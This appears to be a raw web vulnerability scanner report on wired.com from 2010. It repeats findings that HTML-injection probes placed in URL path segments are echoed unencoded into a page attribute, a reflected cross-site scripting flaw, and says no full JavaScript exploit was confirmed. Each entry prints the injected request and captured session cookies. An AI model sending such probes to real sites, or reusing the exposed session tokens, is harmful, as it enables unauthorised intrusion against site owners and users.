GET /science/discoveriesf7f61"><a>3d1be35ff38/news/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:47 GMT Date: Sun, 21 Nov 2010 23:11:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesf7f61"><a>3d1be35ff38 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4422"><a>a534ad9c864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsd4422"><a>a534ad9c864/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:59 GMT Date: Sun, 21 Nov 2010 23:11:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsd4422"><a>a534ad9c864"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba756"><a>b214819a45e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceba756"><a>b214819a45e/discoveries/news/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:08 GMT Date: Sun, 21 Nov 2010 23:12:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceba756"><a>b214819a45e ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8bf"><a>b68eabdde0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries1c8bf"><a>b68eabdde0a/news/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:26 GMT Date: Sun, 21 Nov 2010 23:12:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries1c8bf"><a>b68eabdde0a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1072c"><a>d415fcc8a35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1072c"><a>d415fcc8a35/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:38 GMT Date: Sun, 21 Nov 2010 23:12:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1072c"><a>d415fcc8a35"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d636"><a>723f04a76bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8d636"><a>723f04a76bb/discoveries/news/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:09 GMT Date: Sun, 21 Nov 2010 23:12:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8d636"><a>723f04a76bb ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bced9"><a>8dfd94670a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesbced9"><a>8dfd94670a4/news/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesbced9"><a>8dfd94670a4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448da"><a>54c19bc128c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news448da"><a>54c19bc128c/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:37 GMT Date: Sun, 21 Nov 2010 23:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news448da"><a>54c19bc128c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57bba"><a>ebeb21542cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science57bba"><a>ebeb21542cb/discoveries/news/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:14 GMT Date: Sun, 21 Nov 2010 23:11:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science57bba"><a>ebeb21542cb ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efacc"><a>98895960f43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesefacc"><a>98895960f43/news/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:30 GMT Date: Sun, 21 Nov 2010 23:11:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesefacc"><a>98895960f43 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b39"><a>04ac77873cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news14b39"><a>04ac77873cd/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:41 GMT Date: Sun, 21 Nov 2010 23:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news14b39"><a>04ac77873cd"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c12"><a>9b08e999a3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science33c12"><a>9b08e999a3c/discoveries/news/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:08 GMT Date: Sun, 21 Nov 2010 23:11:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science33c12"><a>9b08e999a3c ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef87"><a>44656895f30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries9ef87"><a>44656895f30/news/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries9ef87"><a>44656895f30 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b064d"><a>cc5c37043de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb064d"><a>cc5c37043de/2008/11/dayintech_1113 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:33 GMT Date: Sun, 21 Nov 2010 23:11:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb064d"><a>cc5c37043de"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e0f8"><a>5f6502cac4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science3e0f8"><a>5f6502cac4b/discoveries/news/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=217 Expires: Sun, 21 Nov 2010 23:16:13 GMT Date: Sun, 21 Nov 2010 23:12:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science3e0f8"><a>5f6502cac4b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bbc"><a>f4bd770cc4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese9bbc"><a>f4bd770cc4f/news/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:51 GMT Date: Sun, 21 Nov 2010 23:12:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriese9bbc"><a>f4bd770cc4f c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22bd1"><a>af088f8d408 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news22bd1"><a>af088f8d408/2009/01/dayintech_0123 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:23:03 GMT Date: Sun, 21 Nov 2010 23:13:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news22bd1"><a>af088f8d408"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69728"><a>07ad95f1437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science69728"><a>07ad95f1437/discoveries/news/2009/01/dayintech_0129 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:16:38 GMT Date: Sun, 21 Nov 2010 23:12:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science69728"><a>07ad95f1437 ss_discoveries c_news"> ...[SNIP]...
